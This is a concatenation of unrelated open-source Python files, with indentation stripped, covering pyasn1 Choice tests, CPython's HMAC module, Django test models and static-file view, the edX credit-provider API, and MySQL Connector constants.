old_asn1['name'] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1['name'] == str2octs('test')
class Choice(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
innerComp = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('count', univ.Integer()),
namedtype.NamedType('flag', univ.Boolean())
)
)
self.s1 = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('sex', innerComp)
)
)
def testTag(self):
assert self.s1.tagSet == tag.TagSet(), 'wrong tagSet'
def testRepr(self):
assert 'Choice' in repr(self.s1.clone().setComponents('a'))
s = self.s1.clone().setComponents(
sex=self.s1.setComponentByPosition(1).getComponentByPosition(1).clone().setComponents(count=univ.Integer(123))
)
assert 'Choice' in repr(s)
def testContains(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert 'name' in self.s1
assert 'sex' not in self.s1
self.s1.setComponentByType(univ.Integer.tagSet, 123, innerFlag=True)
assert 'name' not in self.s1
assert 'sex' in self.s1
def testIter(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert list(self.s1) == ['name']
self.s1.setComponentByType(univ.Integer.tagSet, 123, innerFlag=True)
assert list(self.s1) == ['sex']
def testOuterByTypeWithPythonValue(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert self.s1.getComponentByType(
univ.OctetString.tagSet
) == str2octs('abc')
def testOuterByTypeWithInstanceValue(self):
self.s1.setComponentByType(
univ.OctetString.tagSet, univ.OctetString('abc')
)
assert self.s1.getComponentByType(
univ.OctetString.tagSet
) == str2octs('abc')
def testInnerByTypeWithPythonValue(self):
self.s1.setComponentByType(univ.Integer.tagSet, 123, innerFlag=True)
assert self.s1.getComponentByType(
univ.Integer.tagSet, 1
) == 123
def testInnerByTypeWithInstanceValue(self):
self.s1.setComponentByType(
univ.Integer.tagSet, univ.Integer(123), innerFlag=True
)
assert self.s1.getComponentByType(
univ.Integer.tagSet, 1
) == 123
def testCmp(self):
self.s1.setComponentByName('name', univ.OctetString('abc'))
assert self.s1 == str2octs('abc'), '__cmp__() fails'
def testGetComponent(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert self.s1.getComponent() == str2octs('abc'), 'getComponent() fails'
def testGetName(self):
self.s1.setComponentByType(univ.OctetString.tagSet, 'abc')
assert self.s1.getName() == 'name', 'getName() fails'
def testSetComponentByPosition(self):
self.s1.setComponentByPosition(0, univ.OctetString('Jim'))
assert self.s1 == str2octs('Jim')
def testClone(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
s = self.s1.clone()
assert len(s) == 0
s = self.s1.clone(cloneValueFlag=1)
assert len(s) == 1
assert s.getComponentByPosition(0) == self.s1.getComponentByPosition(0)
def testSetToDefault(self):
s = self.s1.clone()
s.setComponentByName('sex', univ.noValue)
assert s['sex'] is not univ.noValue
def testStaticDef(self):
class InnerChoice(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('count', univ.Integer()),
namedtype.NamedType('flag', univ.Boolean())
)
class OuterChoice(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('sex', InnerChoice())
)
c = OuterChoice()
c.setComponentByType(univ.OctetString.tagSet, 'abc')
assert c.getName() == 'name'
def testGetComponentWithDefault(self):
s = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('id', univ.Integer())
)
)
assert s.getComponentByPosition(0, default=None, instantiate=False) is None
assert s.getComponentByPosition(1, default=None, instantiate=False) is None
assert s.getComponentByName('name', default=None, instantiate=False) is None
assert s.getComponentByName('id', default=None, instantiate=False) is None
assert s.getComponentByType(univ.OctetString.tagSet, default=None) is None
assert s.getComponentByType(univ.Integer.tagSet, default=None) is None
s[1] = 123
assert s.getComponentByPosition(1, default=None) is not None
assert s.getComponentByPosition(1, univ.noValue) == 123
s.clear()
assert s.getComponentByPosition(1, default=None, instantiate=False) is None
def testGetComponentNoInstantiation(self):
s = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('id', univ.Integer())
)
)
assert s.getComponentByPosition(0, instantiate=False) is univ.noValue
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
assert s.getComponentByName('name', instantiate=False) is univ.noValue
assert s.getComponentByName('id', instantiate=False) is univ.noValue
assert s.getComponentByType(univ.OctetString.tagSet, instantiate=False) is univ.noValue
assert s.getComponentByType(univ.Integer.tagSet, instantiate=False) is univ.noValue
s[1] = 123
assert s.getComponentByPosition(1, instantiate=False) is not univ.noValue
assert s.getComponentByPosition(1, instantiate=False) == 123
s.clear()
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
class ChoicePicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('id', univ.Integer())
)
)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Choice
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Choice(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString()),
namedtype.NamedType('id', univ.Integer())
)
)
old_asn1['name'] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1['name'] == str2octs('test')
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite)
| bsd-2-clause |
momm3/WelcomeBot | welcomebot/Lib/hmac.py | 27 | 5057 | """HMAC (Keyed-Hashing for Message Authentication) Python module.
Implements the HMAC algorithm as described by RFC 2104.
"""
import warnings as _warnings
from _operator import _compare_digest as compare_digest
import hashlib as _hashlib
trans_5C = bytes((x ^ 0x5C) for x in range(256))
trans_36 = bytes((x ^ 0x36) for x in range(256))
# The size of the digests returned by HMAC depends on the underlying
# hashing module used. Use digest_size from the instance of HMAC instead.
digest_size = None
class HMAC:
"""RFC 2104 HMAC class. Also complies with RFC 4231.
This supports the API for Cryptographic Hash Functions (PEP 247).
"""
blocksize = 64 # 512-bit HMAC; can be changed in subclasses.
def __init__(self, key, msg = None, digestmod = None):
"""Create a new HMAC object.
key: key for the keyed hash object.
msg: Initial input for the hash, if provided.
digestmod: A module supporting PEP 247. *OR*
A hashlib constructor returning a new hash object. *OR*
A hash name suitable for hashlib.new().
Defaults to hashlib.md5.
Implicit default to hashlib.md5 is deprecated and will be
removed in Python 3.6.
Note: key and msg must be a bytes or bytearray objects.
"""
if not isinstance(key, (bytes, bytearray)):
raise TypeError("key: expected bytes or bytearray, but got %r" % type(key).__name__)
if digestmod is None:
_warnings.warn("HMAC() without an explicit digestmod argument "
"is deprecated.", PendingDeprecationWarning, 2)
digestmod = _hashlib.md5
if callable(digestmod):
self.digest_cons = digestmod
elif isinstance(digestmod, str):
self.digest_cons = lambda d=b'': _hashlib.new(digestmod, d)
else:
self.digest_cons = lambda d=b'': digestmod.new(d)
self.outer = self.digest_cons()
self.inner = self.digest_cons()
self.digest_size = self.inner.digest_size
if hasattr(self.inner, 'block_size'):
blocksize = self.inner.block_size
if blocksize < 16:
_warnings.warn('block_size of %d seems too small; using our '
'default of %d.' % (blocksize, self.blocksize),
RuntimeWarning, 2)
blocksize = self.blocksize
else:
_warnings.warn('No block_size attribute on given digest object; '
'Assuming %d.' % (self.blocksize),
RuntimeWarning, 2)
blocksize = self.blocksize
# self.blocksize is the default blocksize. self.block_size is
# effective block size as well as the public API attribute.
self.block_size = blocksize
if len(key) > blocksize:
key = self.digest_cons(key).digest()
key = key.ljust(blocksize, b'\0')
self.outer.update(key.translate(trans_5C))
self.inner.update(key.translate(trans_36))
if msg is not None:
self.update(msg)
@property
def name(self):
return "hmac-" + self.inner.name
def update(self, msg):
"""Update this hashing object with the string msg.
"""
self.inner.update(msg)
def copy(self):
"""Return a separate copy of this hashing object.
An update to this copy won't affect the original object.
"""
# Call __new__ directly to avoid the expensive __init__.
other = self.__class__.__new__(self.__class__)
other.digest_cons = self.digest_cons
other.digest_size = self.digest_size
other.inner = self.inner.copy()
other.outer = self.outer.copy()
return other
def _current(self):
"""Return a hash object for the current state.
To be used only internally with digest() and hexdigest().
"""
h = self.outer.copy()
h.update(self.inner.digest())
return h
def digest(self):
"""Return the hash value of this hashing object.
This returns a string containing 8-bit data. The object is
not altered in any way by this function; you can continue
updating the object after calling this function.
"""
h = self._current()
return h.digest()
def hexdigest(self):
"""Like digest(), but returns a string of hexadecimal digits instead.
"""
h = self._current()
return h.hexdigest()
def new(key, msg = None, digestmod = None):
"""Create a new hashing object and return it.
key: The starting key for the hash.
msg: if available, will immediately be hashed into the object's starting
state.
You can now feed arbitrary strings into the object using its update()
method, and can ask for the hash value at any time by calling its digest()
method.
"""
return HMAC(key, msg, digestmod)
| mit |
mcardillo55/django | tests/many_to_one/models.py | 128 | 2623 | """
Many-to-one relationships
To define a many-to-one relationship, use ``ForeignKey()``.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Reporter(models.Model):
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=30)
email = models.EmailField()
def __str__(self):
return "%s %s" % (self.first_name, self.last_name)
@python_2_unicode_compatible
class Article(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateField()
reporter = models.ForeignKey(Reporter)
def __str__(self):
return self.headline
class Meta:
ordering = ('headline',)
# If ticket #1578 ever slips back in, these models will not be able to be
# created (the field names being lower-cased versions of their opposite
# classes is important here).
class First(models.Model):
second = models.IntegerField()
class Second(models.Model):
first = models.ForeignKey(First, related_name='the_first')
# Protect against repetition of #1839, #2415 and #2536.
class Third(models.Model):
name = models.CharField(max_length=20)
third = models.ForeignKey('self', null=True, related_name='child_set')
class Parent(models.Model):
name = models.CharField(max_length=20, unique=True)
bestchild = models.ForeignKey('Child', null=True, related_name='favored_by')
class Child(models.Model):
name = models.CharField(max_length=20)
parent = models.ForeignKey(Parent)
class ToFieldChild(models.Model):
parent = models.ForeignKey(Parent, to_field='name')
# Multiple paths to the same model (#7110, #7125)
@python_2_unicode_compatible
class Category(models.Model):
name = models.CharField(max_length=20)
def __str__(self):
return self.name
class Record(models.Model):
category = models.ForeignKey(Category)
@python_2_unicode_compatible
class Relation(models.Model):
left = models.ForeignKey(Record, related_name='left_set')
right = models.ForeignKey(Record, related_name='right_set')
def __str__(self):
return "%s - %s" % (self.left.category.name, self.right.category.name)
# Test related objects visibility.
class SchoolManager(models.Manager):
def get_queryset(self):
return super(SchoolManager, self).get_queryset().filter(is_public=True)
class School(models.Model):
is_public = models.BooleanField(default=False)
objects = SchoolManager()
class Student(models.Model):
school = models.ForeignKey(School)
| bsd-3-clause |
WSDC-NITWarangal/django | django/views/static.py | 300 | 5129 | """
Views and functions for serving static files. These are only to be used
during development, and SHOULD NOT be used in a production setting.
"""
from __future__ import unicode_literals
import mimetypes
import os
import posixpath
import re
import stat
from django.http import (
FileResponse, Http404, HttpResponse, HttpResponseNotModified,
HttpResponseRedirect,
)
from django.template import Context, Engine, TemplateDoesNotExist, loader
from django.utils.http import http_date, parse_http_date
from django.utils.six.moves.urllib.parse import unquote
from django.utils.translation import ugettext as _, ugettext_lazy
def serve(request, path, document_root=None, show_indexes=False):
"""
Serve static files below a given point in the directory structure.
To use, put a URL pattern such as::
from django.views.static import serve
url(r'^(?P<path>.*)$', serve, {'document_root': '/path/to/my/files/'})
in your URLconf. You must provide the ``document_root`` param. You may
also set ``show_indexes`` to ``True`` if you'd like to serve a basic index
of the directory. This index view will use the template hardcoded below,
but if you'd like to override it, you can create a template called
``static/directory_index.html``.
"""
path = posixpath.normpath(unquote(path))
path = path.lstrip('/')
newpath = ''
for part in path.split('/'):
if not part:
# Strip empty path components.
continue
drive, part = os.path.splitdrive(part)
head, part = os.path.split(part)
if part in (os.curdir, os.pardir):
# Strip '.' and '..' in path.
continue
newpath = os.path.join(newpath, part).replace('\\', '/')
if newpath and path != newpath:
return HttpResponseRedirect(newpath)
fullpath = os.path.join(document_root, newpath)
if os.path.isdir(fullpath):
if show_indexes:
return directory_index(newpath, fullpath)
raise Http404(_("Directory indexes are not allowed here."))
if not os.path.exists(fullpath):
raise Http404(_('"%(path)s" does not exist') % {'path': fullpath})
# Respect the If-Modified-Since header.
statobj = os.stat(fullpath)
if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
statobj.st_mtime, statobj.st_size):
return HttpResponseNotModified()
content_type, encoding = mimetypes.guess_type(fullpath)
content_type = content_type or 'application/octet-stream'
response = FileResponse(open(fullpath, 'rb'), content_type=content_type)
response["Last-Modified"] = http_date(statobj.st_mtime)
if stat.S_ISREG(statobj.st_mode):
response["Content-Length"] = statobj.st_size
if encoding:
response["Content-Encoding"] = encoding
return response
DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
{% load i18n %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</title>
</head>
<body>
<h1>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</h1>
<ul>
{% if directory != "/" %}
<li><a href="../">../</a></li>
{% endif %}
{% for f in file_list %}
<li><a href="{{ f|urlencode }}">{{ f }}</a></li>
{% endfor %}
</ul>
</body>
</html>
"""
template_translatable = ugettext_lazy("Index of %(directory)s")
def directory_index(path, fullpath):
try:
t = loader.select_template([
'static/directory_index.html',
'static/directory_index',
])
except TemplateDoesNotExist:
t = Engine().from_string(DEFAULT_DIRECTORY_INDEX_TEMPLATE)
files = []
for f in os.listdir(fullpath):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
f += '/'
files.append(f)
c = Context({
'directory': path + '/',
'file_list': files,
})
return HttpResponse(t.render(c))
def was_modified_since(header=None, mtime=0, size=0):
"""
Was something modified since the user last downloaded it?
header
This is the value of the If-Modified-Since header. If this is None,
I'll just return True.
mtime
This is the modification time of the item we're talking about.
size
This is the size of the item we're talking about.
"""
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
re.IGNORECASE)
header_mtime = parse_http_date(matches.group(1))
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
if int(mtime) > header_mtime:
raise ValueError
except (AttributeError, ValueError, OverflowError):
return True
return False
| bsd-3-clause |
nikolas/edx-platform | openedx/core/djangoapps/credit/api/provider.py | 12 | 15368 | """
API for initiating and tracking requests for credit from a provider.
"""
import datetime
import logging
import pytz
import uuid
from django.db import transaction
from lms.djangoapps.django_comment_client.utils import JsonResponse
from openedx.core.djangoapps.credit.exceptions import (
UserIsNotEligible,
CreditProviderNotConfigured,
RequestAlreadyCompleted,
CreditRequestNotFound,
InvalidCreditStatus,
)
from openedx.core.djangoapps.credit.models import (
CreditProvider,
CreditRequirementStatus,
CreditRequest,
CreditEligibility,
)
from openedx.core.djangoapps.credit.signature import signature, get_shared_secret_key
from student.models import User
from util.date_utils import to_timestamp
log = logging.getLogger(__name__)
def get_credit_providers(providers_list=None):
"""Retrieve all available credit providers or filter on given providers_list.
Arguments:
providers_list (list of strings or None): contains list of ids of credit providers
or None.
Returns:
list of credit providers represented as dictionaries
Response Values:
>>> get_credit_providers(['hogwarts'])
[
{
"id": "hogwarts",
"name": "Hogwarts School of Witchcraft and Wizardry",
"url": "https://credit.example.com/",
"status_url": "https://credit.example.com/status/",
"description: "A new model for the Witchcraft and Wizardry School System.",
"enable_integration": false,
"fulfillment_instructions": "
<p>In order to fulfill credit, Hogwarts School of Witchcraft and Wizardry requires learners to:</p>
<ul>
<li>Sample instruction abc</li>
<li>Sample instruction xyz</li>
</ul>",
},
...
]
"""
return CreditProvider.get_credit_providers(providers_list=providers_list)
def get_credit_provider_info(request, provider_id): # pylint: disable=unused-argument
"""Retrieve the 'CreditProvider' model data against provided
credit provider.
Args:
provider_id (str): The identifier for the credit provider
Returns: 'CreditProvider' data dictionary
Example Usage:
>>> get_credit_provider_info("hogwarts")
{
"provider_id": "hogwarts",
"display_name": "Hogwarts School of Witchcraft and Wizardry",
"provider_url": "https://credit.example.com/",
"provider_status_url": "https://credit.example.com/status/",
"provider_description: "A new model for the Witchcraft and Wizardry School System.",
"enable_integration": False,
"fulfillment_instructions": "
<p>In order to fulfill credit, Hogwarts School of Witchcraft and Wizardry requires learners to:</p>
<ul>
<li>Sample instruction abc</li>
<li>Sample instruction xyz</li>
</ul>",
"thumbnail_url": "https://credit.example.com/logo.png"
}
"""
credit_provider = CreditProvider.get_credit_provider(provider_id=provider_id)
credit_provider_data = {}
if credit_provider:
credit_provider_data = {
"provider_id": credit_provider.provider_id,
"display_name": credit_provider.display_name,
"provider_url": credit_provider.provider_url,
"provider_status_url": credit_provider.provider_status_url,
"provider_description": credit_provider.provider_description,
"enable_integration": credit_provider.enable_integration,
"fulfillment_instructions": credit_provider.fulfillment_instructions,
"thumbnail_url": credit_provider.thumbnail_url
}
return JsonResponse(credit_provider_data)
@transaction.commit_on_success
def create_credit_request(course_key, provider_id, username):
"""
Initiate a request for credit from a credit provider.
This will return the parameters that the user's browser will need to POST
to the credit provider. It does NOT calculate the signature.
Only users who are eligible for credit (have satisfied all credit requirements) are allowed to make requests.
A provider can be configured either with *integration enabled* or not.
If automatic integration is disabled, this method will simply return
a URL to the credit provider and method set to "GET", so the student can
visit the URL and request credit directly. No database record will be created
to track these requests.
If automatic integration *is* enabled, then this will also return the parameters
that the user's browser will need to POST to the credit provider.
These parameters will be digitally signed using a secret key shared with the credit provider.
A database record will be created to track the request with a 32-character UUID.
The returned dictionary can be used by the user's browser to send a POST request to the credit provider.
If a pending request already exists, this function should return a request description with the same UUID.
(Other parameters, such as the user's full name may be different than the original request).
If a completed request (either accepted or rejected) already exists, this function will
raise an exception. Users are not allowed to make additional requests once a request
has been completed.
Arguments:
course_key (CourseKey): The identifier for the course.
provider_id (str): The identifier of the credit provider.
username (str): The user initiating the request.
Returns: dict
Raises:
UserIsNotEligible: The user has not satisfied eligibility requirements for credit.
CreditProviderNotConfigured: The credit provider has not been configured for this course.
RequestAlreadyCompleted: The user has already submitted a request and received a response
from the credit provider.
Example Usage:
>>> create_credit_request(course.id, "hogwarts", "ron")
{
"url": "https://credit.example.com/request",
"method": "POST",
"parameters": {
"request_uuid": "557168d0f7664fe59097106c67c3f847",
"timestamp": 1434631630,
"course_org": "HogwartsX",
"course_num": "Potions101",
"course_run": "1T2015",
"final_grade": 0.95,
"user_username": "ron",
"user_email": "[email protected]",
"user_full_name": "Ron Weasley",
"user_mailing_address": "",
"user_country": "US",
"signature": "cRCNjkE4IzY+erIjRwOQCpRILgOvXx4q2qvx141BCqI="
}
}
"""
try:
user_eligibility = CreditEligibility.objects.select_related('course').get(
username=username,
course__course_key=course_key
)
credit_course = user_eligibility.course
credit_provider = CreditProvider.objects.get(provider_id=provider_id)
except CreditEligibility.DoesNotExist:
log.warning(
u'User "%s" tried to initiate a request for credit in course "%s", '
u'but the user is not eligible for credit',
username, course_key
)
raise UserIsNotEligible
except CreditProvider.DoesNotExist:
log.error(u'Credit provider with ID "%s" has not been configured.', provider_id)
raise CreditProviderNotConfigured
# Check if we've enabled automatic integration with the credit
# provider. If not, we'll show the user a link to a URL
# where the user can request credit directly from the provider.
# Note that we do NOT track these requests in our database,
# since the state would always be "pending" (we never hear back).
if not credit_provider.enable_integration:
return {
"url": credit_provider.provider_url,
"method": "GET",
"parameters": {}
}
else:
# If automatic credit integration is enabled, then try
# to retrieve the shared signature *before* creating the request.
# That way, if there's a misconfiguration, we won't have requests
# in our system that we know weren't sent to the provider.
shared_secret_key = get_shared_secret_key(credit_provider.provider_id)
if shared_secret_key is None:
msg = u'Credit provider with ID "{provider_id}" does not have a secret key configured.'.format(
provider_id=credit_provider.provider_id
)
log.error(msg)
raise CreditProviderNotConfigured(msg)
# Initiate a new request if one has not already been created
credit_request, created = CreditRequest.objects.get_or_create(
course=credit_course,
provider=credit_provider,
username=username,
)
# Check whether we've already gotten a response for a request,
# If so, we're not allowed to issue any further requests.
# Skip checking the status if we know that we just created this record.
if not created and credit_request.status != "pending":
log.warning(
(
u'Cannot initiate credit request because the request with UUID "%s" '
u'exists with status "%s"'
), credit_request.uuid, credit_request.status
)
raise RequestAlreadyCompleted
if created:
credit_request.uuid = uuid.uuid4().hex
# Retrieve user account and profile info
user = User.objects.select_related('profile').get(username=username)
# Retrieve the final grade from the eligibility table
try:
final_grade = CreditRequirementStatus.objects.get(
username=username,
requirement__namespace="grade",
requirement__name="grade",
status="satisfied"
).reason["final_grade"]
except (CreditRequirementStatus.DoesNotExist, TypeError, KeyError):
log.exception(
"Could not retrieve final grade from the credit eligibility table "
"for user %s in course %s.",
user.id, course_key
)
raise UserIsNotEligible
parameters = {
"request_uuid": credit_request.uuid,
"timestamp": to_timestamp(datetime.datetime.now(pytz.UTC)),
"course_org": course_key.org,
"course_num": course_key.course,
"course_run": course_key.run,
"final_grade": final_grade,
"user_username": user.username,
"user_email": user.email,
"user_full_name": user.profile.name,
"user_mailing_address": (
user.profile.mailing_address
if user.profile.mailing_address is not None
else ""
),
"user_country": (
user.profile.country.code
if user.profile.country.code is not None
else ""
),
}
credit_request.parameters = parameters
credit_request.save()
if created:
log.info(u'Created new request for credit with UUID "%s"', credit_request.uuid)
else:
log.info(
u'Updated request for credit with UUID "%s" so the user can re-issue the request',
credit_request.uuid
)
# Sign the parameters using a secret key we share with the credit provider.
parameters["signature"] = signature(parameters, shared_secret_key)
return {
"url": credit_provider.provider_url,
"method": "POST",
"parameters": parameters
}
def update_credit_request_status(request_uuid, provider_id, status):
"""
Update the status of a credit request.
Approve or reject a request for a student to receive credit in a course
from a particular credit provider.
This function does NOT check that the status update is authorized.
The caller needs to handle authentication and authorization (checking the signature
of the message received from the credit provider)
The function is idempotent; if the request has already been updated to the status,
the function does nothing.
Arguments:
request_uuid (str): The unique identifier for the credit request.
provider_id (str): Identifier for the credit provider.
status (str): Either "approved" or "rejected"
Returns: None
Raises:
CreditRequestNotFound: No request exists that is associated with the given provider.
InvalidCreditStatus: The status is not either "approved" or "rejected".
"""
if status not in [CreditRequest.REQUEST_STATUS_APPROVED, CreditRequest.REQUEST_STATUS_REJECTED]:
raise InvalidCreditStatus
try:
request = CreditRequest.objects.get(uuid=request_uuid, provider__provider_id=provider_id)
old_status = request.status
request.status = status
request.save()
log.info(
u'Updated request with UUID "%s" from status "%s" to "%s" for provider with ID "%s".',
request_uuid, old_status, status, provider_id
)
except CreditRequest.DoesNotExist:
msg = (
u'Credit provider with ID "{provider_id}" attempted to '
u'update request with UUID "{request_uuid}", but no request '
u'with this UUID is associated with the provider.'
).format(provider_id=provider_id, request_uuid=request_uuid)
log.warning(msg)
raise CreditRequestNotFound(msg)
def get_credit_requests_for_user(username):
"""
Retrieve the status of a credit request.
Returns either "pending", "approved", or "rejected"
Arguments:
username (unicode): The username of the user who initiated the requests.
Returns: list
Example Usage:
>>> get_credit_request_status_for_user("bob")
[
{
"uuid": "557168d0f7664fe59097106c67c3f847",
"timestamp": 1434631630,
"course_key": "course-v1:HogwartsX+Potions101+1T2015",
"provider": {
"id": "HogwartsX",
"display_name": "Hogwarts School of Witchcraft and Wizardry",
},
"status": "pending" # or "approved" or "rejected"
}
]
"""
return CreditRequest.credit_requests_for_user(username)
def get_credit_request_status(username, course_key):
"""Get the credit request status.
This function returns the status of credit request of user for given course.
It returns the latest request status for the any credit provider.
The valid status are 'pending', 'approved' or 'rejected'.
Args:
username(str): The username of user
course_key(CourseKey): The course locator key
Returns:
A dictionary of credit request user has made if any
"""
credit_request = CreditRequest.get_user_request_status(username, course_key)
return {
"uuid": credit_request.uuid,
"timestamp": credit_request.modified,
"course_key": credit_request.course.course_key,
"provider": {
"id": credit_request.provider.provider_id,
"display_name": credit_request.provider.display_name
},
"status": credit_request.status
} if credit_request else {}
| agpl-3.0 |
drazenzadravec/nequeo | Tools/MySql/python-2.1.3/lib/mysql/connector/constants.py | 17 | 23017 | # MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2009, 2014, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Various MySQL constants and character sets
"""
from .errors import ProgrammingError
from .charsets import MYSQL_CHARACTER_SETS
MAX_PACKET_LENGTH = 16777215
NET_BUFFER_LENGTH = 8192
MAX_MYSQL_TABLE_COLUMNS = 4096
DEFAULT_CONFIGURATION = {
'database': None,
'user': '',
'password': '',
'host': '127.0.0.1',
'port': 3306,
'unix_socket': None,
'use_unicode': True,
'charset': 'utf8',
'collation': None,
'converter_class': None,
'autocommit': False,
'time_zone': None,
'sql_mode': None,
'get_warnings': False,
'raise_on_warnings': False,
'connection_timeout': None,
'client_flags': 0,
'compress': False,
'buffered': False,
'raw': False,
'ssl_ca': None,
'ssl_cert': None,
'ssl_key': None,
'ssl_verify_cert': False,
'passwd': None,
'db': None,
'connect_timeout': None,
'dsn': None,
'force_ipv6': False,
'auth_plugin': None,
'allow_local_infile': True,
'consume_results': False,
}
CNX_POOL_ARGS = ('pool_name', 'pool_size', 'pool_reset_session')
CNX_FABRIC_ARGS = ['fabric_host', 'fabric_username', 'fabric_password',
'fabric_port', 'fabric_connect_attempts',
'fabric_connect_delay', 'fabric_report_errors',
'fabric_ssl_ca', 'fabric_ssl_key', 'fabric_ssl_cert',
'fabric_user']
def flag_is_set(flag, flags):
"""Checks if the flag is set
Returns boolean"""
if (flags & flag) > 0:
return True
return False
class _Constants(object):
"""
Base class for constants
"""
prefix = ''
desc = {}
def __new__(cls):
raise TypeError("Can not instanciate from %s" % cls.__name__)
@classmethod
def get_desc(cls, name):
"""Get description of given constant"""
try:
return cls.desc[name][1]
except:
return None
@classmethod
def get_info(cls, num):
"""Get information about given constant"""
for name, info in cls.desc.items():
if info[0] == num:
return name
return None
@classmethod
def get_full_info(cls):
"""get full information about given constant"""
res = ()
try:
res = ["%s : %s" % (k, v[1]) for k, v in cls.desc.items()]
except Exception as err: # pylint: disable=W0703
res = ('No information found in constant class.%s' % err)
return res
class _Flags(_Constants):
"""Base class for classes describing flags
"""
@classmethod
def get_bit_info(cls, value):
"""Get the name of all bits set
Returns a list of strings."""
res = []
for name, info in cls.desc.items():
if value & info[0]:
res.append(name)
return res
class FieldType(_Constants):
"""MySQL Field Types
"""
prefix = 'FIELD_TYPE_'
DECIMAL = 0x00
TINY = 0x01
SHORT = 0x02
LONG = 0x03
FLOAT = 0x04
DOUBLE = 0x05
NULL = 0x06
TIMESTAMP = 0x07
LONGLONG = 0x08
INT24 = 0x09
DATE = 0x0a
TIME = 0x0b
DATETIME = 0x0c
YEAR = 0x0d
NEWDATE = 0x0e
VARCHAR = 0x0f
BIT = 0x10
NEWDECIMAL = 0xf6
ENUM = 0xf7
SET = 0xf8
TINY_BLOB = 0xf9
MEDIUM_BLOB = 0xfa
LONG_BLOB = 0xfb
BLOB = 0xfc
VAR_STRING = 0xfd
STRING = 0xfe
GEOMETRY = 0xff
desc = {
'DECIMAL': (0x00, 'DECIMAL'),
'TINY': (0x01, 'TINY'),
'SHORT': (0x02, 'SHORT'),
'LONG': (0x03, 'LONG'),
'FLOAT': (0x04, 'FLOAT'),
'DOUBLE': (0x05, 'DOUBLE'),
'NULL': (0x06, 'NULL'),
'TIMESTAMP': (0x07, 'TIMESTAMP'),
'LONGLONG': (0x08, 'LONGLONG'),
'INT24': (0x09, 'INT24'),
'DATE': (0x0a, 'DATE'),
'TIME': (0x0b, 'TIME'),
'DATETIME': (0x0c, 'DATETIME'),
'YEAR': (0x0d, 'YEAR'),
'NEWDATE': (0x0e, 'NEWDATE'),
'VARCHAR': (0x0f, 'VARCHAR'),
'BIT': (0x10, 'BIT'),
'NEWDECIMAL': (0xf6, 'NEWDECIMAL'),
'ENUM': (0xf7, 'ENUM'),
'SET': (0xf8, 'SET'),
'TINY_BLOB': (0xf9, 'TINY_BLOB'),
'MEDIUM_BLOB': (0xfa, 'MEDIUM_BLOB'),
'LONG_BLOB': (0xfb, 'LONG_BLOB'),
'BLOB': (0xfc, 'BLOB'),
'VAR_STRING': (0xfd, 'VAR_STRING'),
'STRING': (0xfe, 'STRING'),
'GEOMETRY': (0xff, 'GEOMETRY'),
}
@classmethod
def get_string_types(cls):
"""Get the list of all string types"""
return [
cls.VARCHAR,
cls.ENUM,
cls.VAR_STRING, cls.STRING,
]
@classmethod
def get_binary_types(cls):
"""Get the list of all binary types"""
return [
cls.TINY_BLOB, cls.MEDIUM_BLOB,
cls.LONG_BLOB, cls.BLOB,
]
